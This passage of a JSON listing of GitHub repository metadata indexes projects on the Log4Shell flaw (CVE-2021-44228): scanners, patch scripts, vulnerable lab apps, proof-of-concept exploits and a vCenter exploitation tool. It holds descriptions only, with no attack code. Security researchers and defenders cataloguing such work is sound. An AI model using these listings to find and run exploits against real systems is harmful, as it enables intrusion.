+ "fork": false,
+ "created_at": "2021-12-18T00:51:46Z",
+ "updated_at": "2021-12-31T13:32:41Z",
+ "pushed_at": "2022-03-29T21:43:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439595430,
+ "name": "scan-log4shell",
+ "full_name": "suniastar\/scan-log4shell",
+ "owner": {
+ "login": "suniastar",
+ "id": 19646660,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19646660?v=4",
+ "html_url": "https:\/\/github.com\/suniastar"
+ },
+ "html_url": "https:\/\/github.com\/suniastar\/scan-log4shell",
+ "description": "A scanning suite to find servers affected by the log4shell flaw (CVE-2021-44228) with example to test it",
+ "fork": false,
+ "created_at": "2021-12-18T11:16:06Z",
+ "updated_at": "2021-12-18T15:55:00Z",
+ "pushed_at": "2021-12-18T15:54:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439596852,
+ "name": "log4jvulnerability-CVE-2021-44228",
+ "full_name": "shivakumarjayaraman\/log4jvulnerability-CVE-2021-44228",
+ "owner": {
+ "login": "shivakumarjayaraman",
+ "id": 63054448,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63054448?v=4",
+ "html_url": "https:\/\/github.com\/shivakumarjayaraman"
+ },
+ "html_url": "https:\/\/github.com\/shivakumarjayaraman\/log4jvulnerability-CVE-2021-44228",
+ "description": "An attempt to understand the log4j vulnerability by looking through the code",
+ "fork": false,
+ "created_at": "2021-12-18T11:23:35Z",
+ "updated_at": "2021-12-18T15:32:08Z",
+ "pushed_at": "2021-12-18T15:32:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439612080,
+ "name": "CVE-2021-44228-PoC",
+ "full_name": "j3kz\/CVE-2021-44228-PoC",
+ "owner": {
+ "login": "j3kz",
+ "id": 6310563,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6310563?v=4",
+ "html_url": "https:\/\/github.com\/j3kz"
+ },
+ "html_url": "https:\/\/github.com\/j3kz\/CVE-2021-44228-PoC",
+ "description": "Self-contained lab environment that runs the exploit safely, all from docker compose",
+ "fork": false,
+ "created_at": "2021-12-18T12:42:04Z",
+ "updated_at": "2021-12-18T14:08:28Z",
+ "pushed_at": "2021-12-18T14:08:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439658571,
+ "name": "log4j-pcap-activity",
+ "full_name": "Apipia\/log4j-pcap-activity",
+ "owner": {
+ "login": "Apipia",
+ "id": 17787069,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17787069?v=4",
+ "html_url": "https:\/\/github.com\/Apipia"
+ },
+ "html_url": "https:\/\/github.com\/Apipia\/log4j-pcap-activity",
+ "description": "A fun activity using a packet capture file from the log4j exploit (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-18T16:09:49Z",
+ "updated_at": "2022-10-18T10:59:33Z",
+ "pushed_at": "2021-12-18T16:51:29Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439698618,
+ "name": "log4shell-docker-lab",
+ "full_name": "axelcurmi\/log4shell-docker-lab",
+ "owner": {
+ "login": "axelcurmi",
+ "id": 23001923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23001923?v=4",
+ "html_url": "https:\/\/github.com\/axelcurmi"
+ },
+ "html_url": "https:\/\/github.com\/axelcurmi\/log4shell-docker-lab",
+ "description": "Log4Shell (CVE-2021-44228) docker lab",
+ "fork": false,
+ "created_at": "2021-12-18T19:30:35Z",
+ "updated_at": "2022-01-05T14:55:14Z",
+ "pushed_at": "2021-12-24T10:28:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439712818,
+ "name": "log4j-2021-vulnerability-study",
+ "full_name": "otaviokr\/log4j-2021-vulnerability-study",
+ "owner": {
+ "login": "otaviokr",
+ "id": 3641421,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3641421?v=4",
+ "html_url": "https:\/\/github.com\/otaviokr"
+ },
+ "html_url": "https:\/\/github.com\/otaviokr\/log4j-2021-vulnerability-study",
+ "description": "This is a showcase how the Log4J vulnerability (CVE-2021-44228) could be explored. This code is safe to run, but understand what it does and how it works!",
+ "fork": false,
+ "created_at": "2021-12-18T20:53:06Z",
+ "updated_at": "2022-01-22T01:46:53Z",
+ "pushed_at": "2022-01-22T01:46:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439769164,
+ "name": "log4j_CVE-2021-44228",
+ "full_name": "kkyehit\/log4j_CVE-2021-44228",
+ "owner": {
+ "login": "kkyehit",
+ "id": 53825723,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53825723?v=4",
+ "html_url": "https:\/\/github.com\/kkyehit"
+ },
+ "html_url": "https:\/\/github.com\/kkyehit\/log4j_CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-19T03:47:54Z",
+ "updated_at": "2021-12-19T03:54:50Z",
+ "pushed_at": "2021-12-19T03:54:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439771479,
+ "name": "inspec-log4j",
+ "full_name": "trickyearlobe\/inspec-log4j",
+ "owner": {
+ "login": "trickyearlobe",
+ "id": 3001322,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3001322?v=4",
+ "html_url": "https:\/\/github.com\/trickyearlobe"
+ },
+ "html_url": "https:\/\/github.com\/trickyearlobe\/inspec-log4j",
+ "description": "An Inspec profile to check for Log4j CVE-2021-44228 and CVE-2021-45046",
+ "fork": false,
+ "created_at": "2021-12-19T04:04:57Z",
+ "updated_at": "2022-05-11T09:35:20Z",
+ "pushed_at": "2021-12-19T05:29:33Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439780948,
+ "name": "Log4J-Simulation-Tool",
+ "full_name": "TheInterception\/Log4J-Simulation-Tool",
+ "owner": {
+ "login": "TheInterception",
+ "id": 58417506,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58417506?v=4",
+ "html_url": "https:\/\/github.com\/TheInterception"
+ },
+ "html_url": "https:\/\/github.com\/TheInterception\/Log4J-Simulation-Tool",
+ "description": "Vulnerability analysis, patch management and exploitation tool forCVE-2021-44228 \/ CVE-2021-45046 \/ CVE-2021-4104",
+ "fork": false,
+ "created_at": "2021-12-19T05:13:25Z",
+ "updated_at": "2023-08-15T12:50:36Z",
+ "pushed_at": "2021-12-25T01:51:35Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "attackvector",
+ "cyber-security",
+ "ethical-hacking",
+ "network-analysis",
+ "redteam"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439803220,
+ "name": "Get-log4j-Windows-local",
+ "full_name": "KeysAU\/Get-log4j-Windows-local",
+ "owner": {
+ "login": "KeysAU",
+ "id": 38932932,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38932932?v=4",
+ "html_url": "https:\/\/github.com\/KeysAU"
+ },
+ "html_url": "https:\/\/github.com\/KeysAU\/Get-log4j-Windows-local",
+ "description": "Identifying all log4j components across on local windows servers. CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-19T07:35:01Z",
+ "updated_at": "2022-10-28T18:51:03Z",
+ "pushed_at": "2021-12-19T08:09:11Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439839460,
+ "name": "Log4Shell-demo",
+ "full_name": "mschmnet\/Log4Shell-demo",
+ "owner": {
+ "login": "mschmnet",
+ "id": 11050119,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11050119?v=4",
+ "html_url": "https:\/\/github.com\/mschmnet"
+ },
+ "html_url": "https:\/\/github.com\/mschmnet\/Log4Shell-demo",
+ "description": "Demo to show how Log4Shell \/ CVE-2021-44228 vulnerability works",
+ "fork": false,
+ "created_at": "2021-12-19T10:57:16Z",
+ "updated_at": "2022-10-14T01:29:51Z",
+ "pushed_at": "2021-12-23T11:59:53Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 439882882,
+ "name": "Log4j_scan_Advance",
+ "full_name": "Rk-000\/Log4j_scan_Advance",
+ "owner": {
+ "login": "Rk-000",
+ "id": 72359463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72359463?v=4",
+ "html_url": "https:\/\/github.com\/Rk-000"
+ },
+ "html_url": "https:\/\/github.com\/Rk-000\/Log4j_scan_Advance",
+ "description": "A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-19T14:20:54Z",
+ "updated_at": "2024-03-21T12:57:10Z",
+ "pushed_at": "2021-12-19T14:23:37Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439889436,
+ "name": "Log4jCenter",
+ "full_name": "puzzlepeaches\/Log4jCenter",
+ "owner": {
+ "login": "puzzlepeaches",
+ "id": 8538866,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8538866?v=4",
+ "html_url": "https:\/\/github.com\/puzzlepeaches"
+ },
+ "html_url": "https:\/\/github.com\/puzzlepeaches\/Log4jCenter",
+ "description": "Exploiting CVE-2021-44228 in vCenter for remote code execution and more. ",
+ "fork": false,
+ "created_at": "2021-12-19T14:48:30Z",
+ "updated_at": "2024-06-04T06:25:19Z",
+ "pushed_at": "2021-12-22T15:56:21Z",
+ "stargazers_count": 97,
+ "watchers_count": 97,
+ "has_discussions": false,
+ "forks_count": 22,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 22,
+ "watchers": 97,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 439931338,
+ "name": "log4shell-rmi-poc",
+ "full_name": "Labout\/log4shell-rmi-poc",
+ "owner": {
+ "login": "Labout",
+ "id": 28622593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28622593?v=4",
+ "html_url": "https:\/\/github.com\/Labout"
+ },
+ "html_url": "https:\/\/github.com\/Labout\/log4shell-rmi-poc",
+ "description": "A Proof of Concept of the Log4j vulnerabilities (CVE-2021-44228) over Java-RMI",
+ "fork": false,
+ "created_at": "2021-12-19T17:53:31Z",
+ "updated_at": "2024-04-28T06:13:53Z",
+ "pushed_at": "2021-12-19T22:09:40Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 440009725,
+ "name": "f-for-java",
+ "full_name": "TotallyNotAHaxxer\/f-for-java",
+ "owner": {
+ "login": "TotallyNotAHaxxer",
+ "id": 87203697,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87203697?v=4",
+ "html_url": "https:\/\/github.com\/TotallyNotAHaxxer"
+ },
+ "html_url": "https:\/\/github.com\/TotallyNotAHaxxer\/f-for-java",
+ "description": "a project written in go and java i abandoned for CVE-2021-44228 try to fix it if you can XD",
+ "fork": false,
+ "created_at": "2021-12-20T01:31:06Z",
+ "updated_at": "2021-12-24T18:06:45Z",
+ "pushed_at": "2022-12-16T03:57:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 440029288,
+ "name": "log4j2-exploit",
+ "full_name": "spasam\/log4j2-exploit",
+ "owner": {
+ "login": "spasam",
+ "id": 438507,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/438507?v=4",
+ "html_url": "https:\/\/github.com\/spasam"
+ },
+ "html_url": "https:\/\/github.com\/spasam\/log4j2-exploit",
+ "description": "log4j2 Log4Shell CVE-2021-44228 proof of concept",
+ "fork": false,
+ "created_at": "2021-12-20T03:16:01Z",
+ "updated_at": "2021-12-21T18:32:07Z",
+ "pushed_at": "2021-12-20T03:19:10Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "log4j2",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 440140065,
+ "name": "cve-2021-44228-log4j-test",
+ "full_name": "bumheehan\/cve-2021-44228-log4j-test",
+ "owner": {
+ "login": "bumheehan",
+ "id": 15325225,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15325225?v=4",
+ "html_url": "https:\/\/github.com\/bumheehan"
+ },
+ "html_url": "https:\/\/github.com\/bumheehan\/cve-2021-44228-log4j-test",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-20T11:07:21Z",
+ "updated_at": "2021-12-22T04:27:08Z",
+ "pushed_at": "2021-12-22T04:27:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 440154999,
+ "name": "log4j-dork-scanner",
+ "full_name": "JagarYousef\/log4j-dork-scanner",
+ "owner": {
+ "login": "JagarYousef",
+ "id": 41321155,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41321155?v=4",
+ "html_url": "https:\/\/github.com\/JagarYousef"
+ },
+ "html_url": "https:\/\/github.com\/JagarYousef\/log4j-dork-scanner",
+ "description": "A script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks",
+ "fork": false,
+ "created_at": "2021-12-20T12:01:52Z",
+ "updated_at": "2023-09-28T11:34:17Z",
+ "pushed_at": "2021-12-20T12:03:48Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "dork-scanner",
+ "log4j",
+ "python-script",
+ "scanner"
+ ],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 440177006,
+ "name": "log4shell-war-fixer",
+ "full_name": "dmitsuo\/log4shell-war-fixer",
+ "owner": {
+ "login": "dmitsuo",
+ "id": 1348764,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1348764?v=4",
+ "html_url": "https:\/\/github.com\/dmitsuo"
+ },
+ "html_url": "https:\/\/github.com\/dmitsuo\/log4shell-war-fixer",
+ "description": "Shell script to remove JndiLookup class from Log4J 2 jar file, inside WAR file, in order to mitigate CVE-2021-44228, a.k.a., #Log4Shell",
+ "fork": false,
+ "created_at": "2021-12-20T13:18:57Z",
+ "updated_at": "2021-12-20T19:21:49Z",
+ "pushed_at": "2021-12-20T16:04:25Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 440183835,
+ "name": "Log4jShell-Scan",
+ "full_name": "Y0-kan\/Log4jShell-Scan",
+ "owner": {
+ "login": "Y0-kan",
+ "id": 96424613,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96424613?v=4",
+ "html_url": "https:\/\/github.com\/Y0-kan"
+ },
+ "html_url": "https:\/\/github.com\/Y0-kan\/Log4jShell-Scan",
+ "description": "log4j2 RCE漏洞(CVE-2021-44228)内网扫描器,可用于在不出网的条件下进行漏洞扫描,帮助企业内部快速发现Log4jShell漏洞。",
+ "fork": false,
+ "created_at": "2021-12-20T13:41:35Z",
+ "updated_at": "2023-12-06T02:42:38Z",
+ "pushed_at": "2021-12-21T06:11:58Z",
+ "stargazers_count": 36,
+ "watchers_count": 36,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 36,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 440216413,
+ "name": "Log4j-Scanner-Exploit",
+ "full_name": "julian911015\/Log4j-Scanner-Exploit",
+ "owner": {
+ "login": "julian911015",
+ "id": 26369589,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26369589?v=4",
+ "html_url": "https:\/\/github.com\/julian911015"
+ },
+ "html_url": "https:\/\/github.com\/julian911015\/Log4j-Scanner-Exploit",
+ "description": "Script en bash que permite identificar la vulnerabilidad Log4j CVE-2021-44228 de forma remota.",
+ "fork": false,
+ "created_at": "2021-12-20T15:22:50Z",
+ "updated_at": "2023-10-10T10:36:48Z",
+ "pushed_at": "2022-12-30T12:32:05Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 440220972,
+ "name": "CVE-2021-44228---detection-with-PowerShell",
+ "full_name": "intel-xeon\/CVE-2021-44228---detection-with-PowerShell",
+ "owner": {
+ "login": "intel-xeon",
+ "id": 37773731,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37773731?v=4",
+ "html_url": "https:\/\/github.com\/intel-xeon"
+ },
+ "html_url": "https:\/\/github.com\/intel-xeon\/CVE-2021-44228---detection-with-PowerShell",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-20T15:38:07Z",
+ "updated_at": "2021-12-23T13:23:27Z",
+ "pushed_at": "2022-06-24T08:00:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 440221338,
+ "name": "log4j-fix-CVE-2021-44228",
+ "full_name": "chandru-gunasekaran\/log4j-fix-CVE-2021-44228",
+ "owner": {
+ "login": "chandru-gunasekaran",
+ "id": 87476739,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87476739?v=4",
+ "html_url": "https:\/\/github.com\/chandru-gunasekaran"
+ },
+ "html_url": "https:\/\/github.com\/chandru-gunasekaran\/log4j-fix-CVE-2021-44228",
+ "description": "Windows Batch Scrip to Fix the log4j-issue-CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-20T15:39:20Z",
+ "updated_at": "2023-09-18T10:37:49Z",
+ "pushed_at": "2021-12-23T09:19:36Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 440261792,
+ "name": "TekiumLog4jApp",
+ "full_name": "erickrr-bd\/TekiumLog4jApp",
+ "owner": {
+ "login": "erickrr-bd",
+ "id": 77643346,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77643346?v=4",
+ "html_url": "https:\/\/github.com\/erickrr-bd"
+ },
+ "html_url": "https:\/\/github.com\/erickrr-bd\/TekiumLog4jApp",
+ "description": "Java application vulnerable to CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-20T17:59:56Z",
+ "updated_at": "2022-02-15T20:16:38Z",
+ "pushed_at": "2022-03-01T00:00:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "app",
+ "cve-2021-44228",
+ "docker",
+ "exploitation",
+ "java",
+ "jndi",
+ "log4j2",
+ "security",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 440275278,
+ "name": "damn-vulnerable-log4j-app",
+ "full_name": "snapattack\/damn-vulnerable-log4j-app",
+ "owner": {
+ "login": "snapattack",
+ "id": 92945688,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92945688?v=4",
+ "html_url": "https:\/\/github.com\/snapattack"
+ },
+ "html_url": "https:\/\/github.com\/snapattack\/damn-vulnerable-log4j-app",
+ "description": "Vulnerable web application to test CVE-2021-44228 \/ log4shell and forensic artifacts from an example attack",
+ "fork": false,
+ "created_at": "2021-12-20T18:51:52Z",
+ "updated_at": "2022-11-22T06:34:31Z",
+ "pushed_at": "2021-12-20T18:55:44Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 440373235,
+ "name": "loguccino",
+ "full_name": "sassoftware\/loguccino",
+ "owner": {
+ "login": "sassoftware",
+ "id": 5289877,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5289877?v=4",
+ "html_url": "https:\/\/github.com\/sassoftware"
+ },
+ "html_url": "https:\/\/github.com\/sassoftware\/loguccino",
+ "description": "Scan and patch tool for CVE-2021-44228 and related log4j concerns. ",
+ "fork": false,
+ "created_at": "2021-12-21T03:01:36Z",
+ "updated_at": "2024-05-15T16:42:25Z",
+ "pushed_at": "2022-01-24T16:43:41Z",
+ "stargazers_count": 34,
+ "watchers_count": 34,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 34,
+ "score": 0,
+ "subscribers_count": 16
+ },
+ {
+ "id": 440408111,
+ "name": "apache-log4j2-CVE-2021-44228",
+ "full_name": "xx-zhang\/apache-log4j2-CVE-2021-44228",
+ "owner": {
+ "login": "xx-zhang",
+ "id": 47806549,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47806549?v=4",
+ "html_url": "https:\/\/github.com\/xx-zhang"
+ },
+ "html_url": "https:\/\/github.com\/xx-zhang\/apache-log4j2-CVE-2021-44228",
+ "description": "相关的复现和文档",
+ "fork": false,
+ "created_at": "2021-12-21T06:03:18Z",
+ "updated_at": "2021-12-21T06:03:18Z",
+ "pushed_at": "2021-12-21T06:03:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 440439859,
+ "name": "Log4Shell-Scanner",
+ "full_name": "r00thunter\/Log4Shell-Scanner",
+ "owner": {
+ "login": "r00thunter",
+ "id": 33806985,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33806985?v=4",
+ "html_url": "https:\/\/github.com\/r00thunter"
+ },
+ "html_url": "https:\/\/github.com\/r00thunter\/Log4Shell-Scanner",
+ "description": "Python script to detect Log4Shell Vulnerability CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-21T08:13:35Z",
+ "updated_at": "2021-12-21T08:15:05Z",
+ "pushed_at": "2021-12-21T08:15:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 440555354,
+ "name": "log4j-spring-vuln-poc",
+ "full_name": "mn-io\/log4j-spring-vuln-poc",
+ "owner": {
+ "login": "mn-io",
+ "id": 4397504,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4397504?v=4",
+ "html_url": "https:\/\/github.com\/mn-io"
+ },
+ "html_url": "https:\/\/github.com\/mn-io\/log4j-spring-vuln-poc",
+ "description": "POC for CVE-2021-44228 within Springboot",
+ "fork": false,
+ "created_at": "2021-12-21T15:00:58Z",
+ "updated_at": "2022-02-24T22:15:47Z",
+ "pushed_at": "2021-12-22T08:58:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 440601926,
+ "name": "log4j2-hack-springboot",
+ "full_name": "rejupillai\/log4j2-hack-springboot",
+ "owner": {
+ "login": "rejupillai",
+ "id": 15153045,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15153045?v=4",
+ "html_url": "https:\/\/github.com\/rejupillai"
+ },
+ "html_url": "https:\/\/github.com\/rejupillai\/log4j2-hack-springboot",
+ "description": "Log4j2 CVE-2021-44228 hack demo for a springboot app",
+ "fork": false,
+ "created_at": "2021-12-21T17:40:02Z",
+ "updated_at": "2021-12-21T19:26:23Z",
+ "pushed_at": "2023-03-22T05:52:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
